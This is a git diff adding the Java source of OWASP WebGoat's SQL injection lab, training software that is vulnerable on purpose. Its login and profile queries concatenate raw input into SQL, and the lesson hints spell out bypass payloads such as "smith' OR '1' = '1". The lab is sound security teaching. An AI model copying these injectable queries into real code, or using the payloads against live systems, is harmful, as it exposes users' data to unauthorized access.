diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ListStaff.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ListStaff.java
new file mode 100644
index 000000000..c66b050e1
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ListStaff.java
@@ -0,0 +1,175 @@
+package org.owasp.webgoat.lessons.SQLInjection;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.util.List;
+import java.util.Vector;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.session.EmployeeStub;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class ListStaff extends DefaultLessonAction
+{
+
+    public ListStaff(GoatHillsFinancial lesson, String lessonName, String actionName)
+    {
+	super(lesson, lessonName, actionName);
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException
+    {
+	getLesson().setCurrentAction(s, getActionName());
+
+	if (isAuthenticated(s))
+	{
+	    int userId = getIntSessionAttribute(s, getLessonName() + "."
+		    + SQLInjection.USER_ID);
+
+	    List employees = getAllEmployees(s, userId);
+	    setSessionAttribute(s, getLessonName() + "."
+		    + SQLInjection.STAFF_ATTRIBUTE_KEY, employees);
+	}
+	else
+	    throw new UnauthenticatedException();
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	return SQLInjection.LISTSTAFF_ACTION;
+    }
+
+
+    public List getAllEmployees(WebSession s, int userId)
+	    throws UnauthorizedException
+    {
+	// Query the database for all employees "owned" by the given employee
+
+	List<EmployeeStub> employees = new Vector<EmployeeStub>();
+
+	try
+	{
+	    String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in "
+		    + "(SELECT employee_id FROM ownership WHERE employer_id = "
+		    + userId + ")";
+
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		answer_results.beforeFirst();
+		while (answer_results.next())
+		{
+		    int employeeId = answer_results.getInt("userid");
+		    String firstName = answer_results.getString("first_name");
+		    String lastName = answer_results.getString("last_name");
+		    String role = answer_results.getString("role");
+		    //System.out.println("Retrieving employee stub for role " + role);
+		    EmployeeStub stub = new EmployeeStub(employeeId, firstName,
+			    lastName, role);
+		    employees.add(stub);
+		}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employees");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employees");
+	    e.printStackTrace();
+	}
+
+	return employees;
+    }
+
+
+    public List getAllEmployees_BACKUP(WebSession s, int userId)
+	    throws UnauthorizedException
+    {
+	// Query the database for all employees "owned" by the given employee
+
+	List<EmployeeStub> employees = new Vector<EmployeeStub>();
+
+	try
+	{
+	    String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in "
+		    + "(SELECT employee_id FROM ownership WHERE employer_id = "
+		    + userId + ")";
+
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		answer_results.beforeFirst();
+		while (answer_results.next())
+		{
+		    int employeeId = answer_results.getInt("userid");
+		    String firstName = answer_results.getString("first_name");
+		    String lastName = answer_results.getString("last_name");
+		    String role = answer_results.getString("role");
+		    //System.out.println("Retrieving employee stub for role " + role);
+		    EmployeeStub stub = new EmployeeStub(employeeId, firstName,
+			    lastName, role);
+		    employees.add(stub);
+		}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employees");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employees");
+	    e.printStackTrace();
+	}
+
+	return employees;
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java
new file mode 100644
index 000000000..7cdbf5c0b
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java
@@ -0,0 +1,297 @@
+package org.owasp.webgoat.lessons.SQLInjection;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.util.List;
+import java.util.Vector;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.session.EmployeeStub;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class Login extends DefaultLessonAction
+{
+
+    private LessonAction chainedAction;
+
+
+    public Login(GoatHillsFinancial lesson, String lessonName, String actionName,
+	    LessonAction chainedAction)
+    {
+	super(lesson, lessonName, actionName);
+	this.chainedAction = chainedAction;
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    ValidationException
+    {
+	//System.out.println("Login.handleRequest()");
+	getLesson().setCurrentAction(s, getActionName());
+
+	List employees = getAllEmployees(s);
+	setSessionAttribute(s, getLessonName() + "."
+		+ SQLInjection.STAFF_ATTRIBUTE_KEY, employees);
+
+	String employeeId = null;
+	try
+	{
+	    employeeId = s.getParser().getStringParameter(
+		    SQLInjection.EMPLOYEE_ID);
+	    String password = s.getParser().getRawParameter(
+		    SQLInjection.PASSWORD);
+
+	    // Attempt authentication
+	    boolean authenticated = login(s, employeeId, password);
+
+	    updateLessonStatus(s);
+
+	    if (authenticated)
+	    {
+		// Execute the chained Action if authentication succeeded.
+		try
+		{
+		    chainedAction.handleRequest(s);
+		}
+		catch (UnauthenticatedException ue1)
+		{
+		    System.out.println("Internal server error");
+		    ue1.printStackTrace();
+		}
+		catch (UnauthorizedException ue2)
+		{
+		    System.out.println("Internal server error");
+		    ue2.printStackTrace();
+		}
+	    }
+	    else
+		s.setMessage("Login failed");
+
+	}
+	catch (ParameterNotFoundException pnfe)
+	{
+	    // No credentials offered, so we log them out
+	    setSessionAttribute(s, getLessonName() + ".isAuthenticated",
+		    Boolean.FALSE);
+	}
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	String nextPage = SQLInjection.LOGIN_ACTION;
+
+	if (isAuthenticated(s))
+	    nextPage = chainedAction.getNextPage(s);
+
+	return nextPage;
+
+    }
+
+
+    public boolean requiresAuthentication()
+    {
+	return false;
+    }
+
+
+    public boolean login(WebSession s, String userId, String password)
+    {
+	//System.out.println("Logging in to lesson");
+	boolean authenticated = false;
+
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE userid = " + userId
+		    + " and password = '" + password + "'";
+	    //System.out.println("Query:" + query);			
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		if (answer_results.first())
+		{
+		    setSessionAttribute(s,
+			    getLessonName() + ".isAuthenticated", Boolean.TRUE);
+		    setSessionAttribute(s, getLessonName() + "."
+			    + SQLInjection.USER_ID, userId);
+		    authenticated = true;
+		}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error logging in");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error logging in");
+	    e.printStackTrace();
+	}
+
+	//System.out.println("Lesson login result: " + authenticated);
+	return authenticated;
+    }
+
+
+    public boolean login_BACKUP(WebSession s, String userId, String password)
+    {
+	//System.out.println("Logging in to lesson");
+	boolean authenticated = false;
+
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE userid = " + userId
+		    + " and password = '" + password + "'";
+	    //System.out.println("Query:" + query);			
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		if (answer_results.first())
+		{
+		    setSessionAttribute(s,
+			    getLessonName() + ".isAuthenticated", Boolean.TRUE);
+		    setSessionAttribute(s, getLessonName() + "."
+			    + SQLInjection.USER_ID, userId);
+		    authenticated = true;
+		}
+
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error logging in");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error logging in");
+	    e.printStackTrace();
+	}
+
+	//System.out.println("Lesson login result: " + authenticated);
+	return authenticated;
+    }
+
+
+    public List getAllEmployees(WebSession s)
+    {
+	List<EmployeeStub> employees = new Vector<EmployeeStub>();
+
+	// Query the database for all roles the given employee belongs to
+	// Query the database for all employees "owned" by these roles
+
+	try
+	{
+	    String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles "
+		    + "where employee.userid=roles.userid";
+
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		answer_results.beforeFirst();
+		while (answer_results.next())
+		{
+		    int employeeId = answer_results.getInt("userid");
+		    String firstName = answer_results.getString("first_name");
+		    String lastName = answer_results.getString("last_name");
+		    String role = answer_results.getString("role");
+		    EmployeeStub stub = new EmployeeStub(employeeId, firstName,
+			    lastName, role);
+		    employees.add(stub);
+		}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employees");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employees");
+	    e.printStackTrace();
+	}
+
+	return employees;
+    }
+
+
+    private void updateLessonStatus(WebSession s)
+    {
+	try
+	{
+	    String employeeId = s.getParser().getStringParameter(
+		    SQLInjection.EMPLOYEE_ID);
+	    String password = s.getParser().getRawParameter(
+		    SQLInjection.PASSWORD);
+	    String stage = getStage(s);
+	    if (SQLInjection.STAGE1.equals(stage))
+	    {
+		    if (Integer.parseInt(employeeId) == SQLInjection.PRIZE_EMPLOYEE_ID
+			    && isAuthenticated(s))
+		    {
+			setStageComplete(s, SQLInjection.STAGE1);
+		    }
+	    }
+	    else if (SQLInjection.STAGE2.equals(stage))
+	    {
+		    // This assumes the student hasn't modified login_BACKUP().
+		    if (Integer.parseInt(employeeId) == SQLInjection.PRIZE_EMPLOYEE_ID
+			    && !isAuthenticated(s)
+			    && login_BACKUP(s, employeeId, password))
+		    {
+			setStageComplete(s, SQLInjection.STAGE2);
+		    }
+	    }
+	}
+	catch (ParameterNotFoundException pnfe)
+	{}
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java
new file mode 100644
index 000000000..fac41d1b1
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java
@@ -0,0 +1,266 @@
+package org.owasp.webgoat.lessons.SQLInjection;
+
+import java.util.ArrayList;
+import java.util.List;
+import org.apache.ecs.ElementContainer;
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DeleteProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.EditProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.FindProfile;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.Logout;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.SearchStaff;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.UpdateProfile;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class SQLInjection extends GoatHillsFinancial
+{
+    private final static Integer DEFAULT_RANKING = new Integer(75);
+
+    public final static int PRIZE_EMPLOYEE_ID = 112;
+
+    public final static String PRIZE_EMPLOYEE_NAME = "Neville Bartholomew";
+
+    public final static String STAGE1 = "String SQL Injection";
+    
+    public final static String STAGE2 = "Parameterized Query #1";
+    
+    public final static String STAGE3 = "Numeric SQL Injection";
+    
+    public final static String STAGE4 = "Parameterized Query #2";
+    
+    public void registerActions(String className)
+    {
+	registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
+	registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
+	registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
+	registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
+	registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
+
+	// These actions are special in that they chain to other actions.
+	registerAction(new Login(this, className, LOGIN_ACTION,
+		getAction(LISTSTAFF_ACTION)));
+	registerAction(new Logout(this, className, LOGOUT_ACTION,
+		getAction(LOGIN_ACTION)));
+	registerAction(new FindProfile(this, className, FINDPROFILE_ACTION,
+		getAction(VIEWPROFILE_ACTION)));
+	registerAction(new UpdateProfile(this, className,
+		UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
+	registerAction(new DeleteProfile(this, className,
+		DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
+    }
+
+    /**
+     *  Gets the category attribute of the CrossSiteScripting object
+     *
+     * @return    The category value
+     */
+    public Category getDefaultCategory()
+    {
+	return Category.INJECTION;
+    }
+
+    /**
+     *  Gets the hints attribute of the DirectoryScreen object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints
+		.add("The application is taking your input and inserting it at the end of a pre-formed SQL command.");
+	hints
+		.add("This is the code for the query being built and issued by WebGoat:<br><br> "
+			+ "\"SELECT * FROM employee WHERE userid = \" + userId + \" and password = \" + password");
+	hints
+		.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR.  "
+			+ "Try appending a SQL statement that always resolves to true");
+
+	// Stage 1
+	hints
+		.add("You may need to use WebScarab to remove a field length limit to fit your attack.");
+	hints.add("Try entering a password of [ smith' OR '1' = '1 ].");
+
+	// Stage 2
+	hints
+		.add("Many of WebGoat's database queries are already parameterized.  Search the project for PreparedStatement.");
+
+	// Stage 3
+	hints
+		.add("Try entering an employee_id of [ 101 OR 1=1 ORDER BY 'salary' ].");
+
+	// Stage 4
+
+	return hints;
+    }
+
+    @Override
+	public String[] getStages() {
+    	if (getWebgoatContext().isCodingExercises())
+    		return new String[] {STAGE1, STAGE2, STAGE3, STAGE4};
+    	return new String[] {STAGE1, STAGE3};
+	}
+
+    /**
+     *  Gets the instructions attribute of the ParameterInjection object
+     *
+     * @return    The instructions value
+     */
+    public String getInstructions(WebSession s)
+    {
+	String instructions = "";
+
+	if (!getLessonTracker(s).getCompleted())
+	{
+		String stage = getStage(s);
+		if (STAGE1.equals(stage))
+	    {
+		    instructions = "Stage 1: Use String SQL Injection to bypass authentication. "
+			    + "Use SQL injection to log in as the boss ('Neville') without using the correct password.  "
+			    + "Verify that Neville's profile can be viewed and that all functions are available (including Search, Create, and Delete).";
+	    }
+		else if (STAGE2.equals(stage))
+		{
+		    instructions = "Stage 2: Block SQL Injection using a Parameterized Query.<br>"
+			    + "Implement a fix to block SQL injection into the fields in question on the Login page. "
+			    + "Repeat stage 1.  Verify that the attack is no longer effective.";
+		}
+		else if (STAGE3.equals(stage))
+		{
+		    instructions = "Stage 3: Execute SQL Injection to bypass authorization.<br>"
+			    + "As regular employee 'Larry', use SQL injection into a parameter of the View function "
+			    + "(from the List Staff page) to view the profile of the boss ('Neville').";
+		}
+		else if (STAGE4.equals(stage))
+		{
+		    instructions = "Stage 4: Block SQL Injection using a Parameterized Query.<br>"
+			    + "Implement a fix to block SQL injection into the relevant parameter. "
+			    + "Repeat stage 3.  Verify that access to Neville's profile is properly blocked.";
+	    }
+	}
+
+	return instructions;
+    }
+
+    public void handleRequest(WebSession s)
+    {
+	if (s.getLessonSession(this) == null)
+	    s.openLessonSession(this);
+
+	String requestedActionName = null;
+	try
+	{
+	    requestedActionName = s.getParser().getStringParameter("action");
+	}
+	catch (ParameterNotFoundException pnfe)
+	{
+	    // Let them eat login page.
+	    requestedActionName = LOGIN_ACTION;
+	}
+
+	if (requestedActionName != null)
+	{
+	    try
+	    {
+		LessonAction action = getAction(requestedActionName);
+		if (action != null)
+		{
+		    //System.out.println("CrossSiteScripting.handleRequest() dispatching to: " + action.getActionName());
+		    if (!action.requiresAuthentication()
+			    || action.isAuthenticated(s))
+		    {
+			action.handleRequest(s);
+			//setCurrentAction(s, action.getNextPage(s));
+		    }
+		}
+		else
+		    setCurrentAction(s, ERROR_ACTION);
+	    }
+	    catch (ParameterNotFoundException pnfe)
+	    {
+		System.out.println("Missing parameter");
+		pnfe.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	    catch (ValidationException ve)
+	    {
+		System.out.println("Validation failed");
+		ve.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	    catch (UnauthenticatedException ue)
+	    {
+		s.setMessage("Login failed");
+		System.out.println("Authentication failure");
+		ue.printStackTrace();
+	    }
+	    catch (UnauthorizedException ue2)
+	    {
+		s.setMessage("You are not authorized to perform this function");
+		System.out.println("Authorization failure");
+		ue2.printStackTrace();
+	    }
+	    catch (Exception e)
+	    {
+		// All other errors send the user to the generic error page
+		System.out.println("handleRequest() error");
+		e.printStackTrace();
+		setCurrentAction(s, ERROR_ACTION);
+	    }
+	}
+
+	// All this does for this lesson is ensure that a non-null content exists.
+	setContent(new ElementContainer());
+    }
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the CrossSiteScripting object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return "LAB: SQL Injection";
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java
new file mode 100644
index 000000000..ec93058f2
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ViewProfile.java
@@ -0,0 +1,268 @@
+package org.owasp.webgoat.lessons.SQLInjection;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
+import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class ViewProfile extends DefaultLessonAction
+{
+
+    public ViewProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName)
+    {
+	super(lesson, lessonName, actionName);
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException
+    {
+	getLesson().setCurrentAction(s, getActionName());
+
+	Employee employee = null;
+
+	if (isAuthenticated(s))
+	{
+	    String userId = getSessionAttribute(s, getLessonName() + "."
+		    + SQLInjection.USER_ID);
+	    String employeeId = null;
+	    try
+	    {
+		// User selected employee
+		employeeId = s.getParser().getRawParameter(
+			SQLInjection.EMPLOYEE_ID);
+	    }
+	    catch (ParameterNotFoundException e)
+	    {
+		// May be an internally selected employee
+		employeeId = getRequestAttribute(s, getLessonName() + "."
+			+ SQLInjection.EMPLOYEE_ID);
+	    }
+
+	    // FIXME: If this fails and returns null, ViewProfile.jsp will blow up as it expects an Employee.
+	    // Most other JSP's can handle null session attributes.
+	    employee = getEmployeeProfile(s, userId, employeeId);
+	    // If employee==null redirect to the error page.
+	    if (employee == null)
+		getLesson().setCurrentAction(s, SQLInjection.ERROR_ACTION);
+	    else
+		setSessionAttribute(s, getLessonName() + "."
+			+ SQLInjection.EMPLOYEE_ATTRIBUTE_KEY, employee);
+	}
+	else
+	    throw new UnauthenticatedException();
+
+	updateLessonStatus(s, employee);
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	return SQLInjection.VIEWPROFILE_ACTION;
+    }
+
+
+    public Employee getEmployeeProfile(WebSession s, String userId,
+	    String subjectUserId) throws UnauthorizedException
+    {
+	Employee profile = null;
+
+	// Query the database for the profile data of the given employee
+	try
+	{
+	    String query = "SELECT employee.* " +
+		"FROM employee,ownership WHERE employee.userid = ownership.employee_id and " +
+		"ownership.employer_id = " + userId + " and ownership.employee_id = " + subjectUserId;
+
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		if (answer_results.next())
+		{
+		    // Note: Do NOT get the password field.
+		    profile = new Employee(answer_results.getInt("userid"),
+			    answer_results.getString("first_name"),
+			    answer_results.getString("last_name"),
+			    answer_results.getString("ssn"), answer_results
+				    .getString("title"), answer_results
+				    .getString("phone"), answer_results
+				    .getString("address1"), answer_results
+				    .getString("address2"), answer_results
+				    .getInt("manager"), answer_results
+				    .getString("start_date"), answer_results
+				    .getInt("salary"), answer_results
+				    .getString("ccn"), answer_results
+				    .getInt("ccn_limit"), answer_results
+				    .getString("disciplined_date"),
+			    answer_results.getString("disciplined_notes"),
+			    answer_results.getString("personal_description"));
+		    /*					System.out.println("Retrieved employee from db: " + 
+		     profile.getFirstName() + " " + profile.getLastName() + 
+		     " (" + profile.getId() + ")");
+		     */}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employee profile");
+	    e.printStackTrace();
+	}
+
+	return profile;
+    }
+
+
+    public Employee getEmployeeProfile_BACKUP(WebSession s, String userId,
+	    String subjectUserId) throws UnauthorizedException
+    {
+	// Query the database to determine if this employee has access to this function
+	// Query the database for the profile data of the given employee if "owned" by the given user
+
+	Employee profile = null;
+
+	// Query the database for the profile data of the given employee
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE userid = "
+		    + subjectUserId;
+
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		if (answer_results.next())
+		{
+		    // Note: Do NOT get the password field.
+		    profile = new Employee(answer_results.getInt("userid"),
+			    answer_results.getString("first_name"),
+			    answer_results.getString("last_name"),
+			    answer_results.getString("ssn"), answer_results
+				    .getString("title"), answer_results
+				    .getString("phone"), answer_results
+				    .getString("address1"), answer_results
+				    .getString("address2"), answer_results
+				    .getInt("manager"), answer_results
+				    .getString("start_date"), answer_results
+				    .getInt("salary"), answer_results
+				    .getString("ccn"), answer_results
+				    .getInt("ccn_limit"), answer_results
+				    .getString("disciplined_date"),
+			    answer_results.getString("disciplined_notes"),
+			    answer_results.getString("personal_description"));
+		    /*					System.out.println("Retrieved employee from db: " + 
+		     profile.getFirstName() + " " + profile.getLastName() + 
+		     " (" + profile.getId() + ")");
+		     */}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employee profile");
+	    e.printStackTrace();
+	}
+
+	return profile;
+    }
+
+
+    private void updateLessonStatus(WebSession s, Employee employee)
+    {
+	try
+	{
+	    String userId = getSessionAttribute(s, getLessonName() + "."
+		    + SQLInjection.USER_ID);
+	    String employeeId = s.getParser().getRawParameter(
+		    SQLInjection.EMPLOYEE_ID);
+	    String stage = getStage(s);
+	    if (SQLInjection.STAGE3.equals(stage))
+	    {
+		    // If the employee we are viewing is the prize and we are not authorized to have it, 
+		    // the stage is completed
+		    if (employee != null
+			    && employee.getId() == SQLInjection.PRIZE_EMPLOYEE_ID
+			    && !isAuthorizedForEmployee(s, Integer
+				    .parseInt(userId), employee.getId()))
+		    {
+			setStageComplete(s, SQLInjection.STAGE3);
+		    }
+	    }
+	    else if (SQLInjection.STAGE4.equals(stage))
+	    {
+		    // If we were denied the employee to view, and we would have been able to view it
+		    // in the broken state, the stage is completed.
+		    // This assumes the student hasn't modified getEmployeeProfile_BACKUP().
+		    if (employee == null)
+		    {
+			Employee targetEmployee = null;
+			try
+			{
+			    targetEmployee = getEmployeeProfile_BACKUP(s,
+				    userId, employeeId);
+			}
+			catch (UnauthorizedException e)
+			{}
+			if (targetEmployee != null
+				&& targetEmployee.getId() == SQLInjection.PRIZE_EMPLOYEE_ID)
+			{
+			    setStageComplete(s, SQLInjection.STAGE4);
+			}
+		    }
+	    }
+	}
+	catch (ParameterNotFoundException pnfe)
+	{}
+    }
+
+}
